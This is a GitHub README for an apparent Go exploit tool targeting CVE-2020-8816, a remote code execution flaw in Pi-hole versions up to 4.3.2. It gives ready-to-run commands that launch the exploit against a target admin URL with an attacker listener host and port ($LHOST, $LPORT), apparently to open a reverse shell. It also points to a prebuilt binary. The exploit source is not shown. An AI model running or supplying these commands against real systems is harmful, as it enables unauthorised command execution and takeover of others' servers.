Skip to content

Latest commit

 

History

History
24 lines (11 loc) · 902 Bytes

README.md

File metadata and controls

24 lines (11 loc) · 902 Bytes

CVE 2020-8816 :

Pi-hole (versions <= 4.3.2 ) is affected by a Remote Code Execution vulnerability. An authenticated user of the Web portal can execute arbitrary command with the underlying server with the privileges of the local user executing the service.

EXAMPLE :

go run CVE-2020-8816.go -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/

or download the binary CVE-2020-8816 :

./CVE-2020-8816 -host $LHOST -p $LPORT -pass admin -u http://4c9a7a45fa37.ngrok.io/admin/

page

page

page

References :